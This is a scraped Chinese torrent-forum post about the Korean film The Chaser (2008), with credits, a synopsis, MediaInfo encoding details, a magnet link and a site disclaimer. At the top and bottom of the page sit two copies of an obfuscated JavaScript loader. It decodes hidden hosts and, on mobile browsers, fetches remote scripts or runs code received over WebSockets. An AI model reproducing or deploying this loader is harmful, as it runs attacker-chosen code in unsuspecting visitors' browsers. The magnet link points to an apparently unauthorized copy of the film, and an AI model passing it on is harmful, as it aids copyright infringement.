追击者[中文字幕].The.Chaser.2008.1080p.BluRay.x265.10bit.DTS 6.62GB

版主小s 1月前 359

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 追击者 / The Chaser
◎片  名 ???
◎年  代 2008
◎产  地 韩国
◎类  别 剧情 / 惊悚 / 犯罪
◎语  言 韩语
◎上映日期 2008-02-14(韩国)
◎IMDb链接 https://www.imdb.com/title/tt1190539/
◎豆瓣评分 8.4/10 (199781人评价)
◎豆瓣链接 https://movie.douban.com/subject/3006309/
◎片  长 125分钟
◎导  演 罗泓轸 Hong-jin Na (id:1274385)
◎编  剧 罗泓轸 Hong-jin Na (id:1274385)
       洪元灿 Won-Chan Hong (id:1349036)
◎演  员 河正宇 Jung-woo Ha (id:1032680)
       金允石 Yoon-suk Kim (id:1310942)
       徐英姬 Yeong-hie Seo (id:1018688)
       金裕贞 Yoo-Jeong Kim (id:1313572)
       郑仁基 In-gi Jeong (id:1320459)
       朴孝朱 Hyo-ju Park (id:1029817)
       李相熹 Jang-yoo  Lee (id:1399902)
       吕茂英 Moo-yeong Yeo (id:1397112)
       夏成光 Seong-gwang Ha (id:1410232)
       郑西仁 Seo-In Jeong (id:1423713)
       朴镇宇 Park Jin-woo (id:1376719)
       张宥 Yoo Jang (id:1448121)
       俞智妍 ??? (id:1382612)
       具本雄 Bon-woong Koo (id:1391810)
       李仁喆 Lee In-chul (id:1380176)
       郑基燮 Gi-seop Jeong (id:1381664)
       闵庆珍 Kyoung-jin Min (id:1373552)
       宋永世 Song Yo-sep (id:1356071)
       赵德济 Jo Duk-je (id:1386557)
       李钟求 Jong-goo Lee (id:1387369)
       金都炫 Do-Hyeon Kim (id:1458411)
       郑升求 Seung-koo Jhung (id:1432555)
       金鲜珉 Sun-min Kim (id:1302605)
       李民复 Min-bok Lee (id:1306144)
       蔡京华 Kyung-hwa Chae (id:1312176)

◎标  签 犯罪 / 韩国 / 悬疑 / 韩国电影 / 河正宇 / 惊悚 / 暴力 / 人性

◎简  介
  深夜的首尔街头,出租车上频频被插上写有电话的应召女郎的卡片。前刑警忠浩(金允石 Yun-seok Kim 饰)手下就有着一批应召女郎,表面粗暴野蛮的他,对姐妹们貌似毫不讲理。最近忠浩手下的姐妹频频发生失踪事件,他认为是有人故意把她们拐卖。暴跳如雷的他猛翻登记簿寻找蛛丝 马迹,最后确定了一个嫌疑电话尾数为4885。正好这个电话这时呼入需要应召女郎。忠浩让美珍(徐英姬 Yeong-hie Seo 饰)前去。                                       
                                    正在家里发烧卧床的美珍想拒绝,无奈拗不过忠浩,留下七岁女儿在家后还是出门了。忠浩让她记住对方的地址并且用短信告诉他,叮嘱她别搞砸。忠浩亦同时尾随而去,想揪出这个拐卖贩子。美珍跟着4885池英民(河正宇 Jung-woo Ha 饰)进入房间时发觉一切已经太迟,在这个毫无信号的地方,池英民要将她残忍杀害……                                       
                                    失去美珍联系的忠浩开始四处寻找,偶遇到池英民后...

◎获奖情况 (共3项)
  第3届亚洲电影大奖 (2009)
  最佳男主角(提名)
   └──河正宇 (id:1032680)
  最佳编剧(提名)
   └──罗泓轸 (id:1274385)
  最佳剪接
   └──金鲜珉 (id:1302605)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 88351876500690016843565329041067173764 (0x4277F3D463923829B9445EF4B4516784)

  4. Complete name                            : The Chaser 2008 1080p Blu-ray x265 10bit [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.62 GiB

  8. Duration                                 : 1 h 59 min

  9. Overall bit rate                         : 7 901 kb/s

  10. Encoded date                             : UTC 2021-09-02 13:21:16

  11. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover                                    : Yes

  14. Attachments                              : cover.jpg


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@Main

  20. Codec ID                                 : V_MPEGH/ISO/HEVC

  21. Duration                                 : 1 h 59 min

  22. Bit rate                                 : 6 363 kb/s

  23. Width                                    : 1 920 pixels

  24. Height                                   : 816 pixels

  25. Display aspect ratio                     : 2.35:1

  26. Frame rate mode                          : Constant

  27. Frame rate                               : 25.000 FPS

  28. Color space                              : YUV

  29. Chroma subsampling                       : 4:2:0

  30. Bit depth                                : 10 bits

  31. Bits/(Pixel*Frame)                       : 0.162

  32. Stream size                              : 5.33 GiB (81%)

  33. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  34. Encoding settings                        : rc=crf / crf=19.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=5 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Language                                 : English

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio

  39. ID                                       : 2

  40. ID in the original source medium         : 4353 (0x1101)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 59 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 16 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 1.26 GiB (19%)

  54. Language                                 : Korean

  55. Default                                  : Yes

  56. Forced                                   : No

  57. Original source medium                   : Blu-ray


  58. Text #1

  59. ID                                       : 3

  60. Format                                   : PGS

  61. Muxing mode                              : zlib

  62. Codec ID                                 : S_HDMV/PGS

  63. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration                                 : 1 h 54 min

  65. Bit rate                                 : 18.7 kb/s

  66. Count of elements                        : 2721

  67. Stream size                              : 15.4 MiB (0%)

  68. Title                                    : chs

  69. Language                                 : Chinese

  70. Default                                  : Yes

  71. Forced                                   : No


  72. Text #2

  73. ID                                       : 4

  74. Format                                   : PGS

  75. Muxing mode                              : zlib

  76. Codec ID                                 : S_HDMV/PGS

  77. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration                                 : 1 h 54 min

  79. Bit rate                                 : 19.0 kb/s

  80. Count of elements                        : 2721

  81. Stream size                              : 15.6 MiB (0%)

  82. Title                                    : cht

  83. Language                                 : Chinese

  84. Default                                  : No

  85. Forced                                   : No


  86. Text #3

  87. ID                                       : 5

  88. Format                                   : PGS

  89. Muxing mode                              : zlib

  90. Codec ID                                 : S_HDMV/PGS

  91. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration                                 : 1 h 54 min

  93. Bit rate                                 : 24.8 kb/s

  94. Count of elements                        : 2674

  95. Stream size                              : 20.2 MiB (0%)

  96. Title                                    : eng

  97. Language                                 : English

  98. Default                                  : No

  99. Forced                                   : No



TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:75FD89348B8BDF2E0351131F17CBDC13F5562C10

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};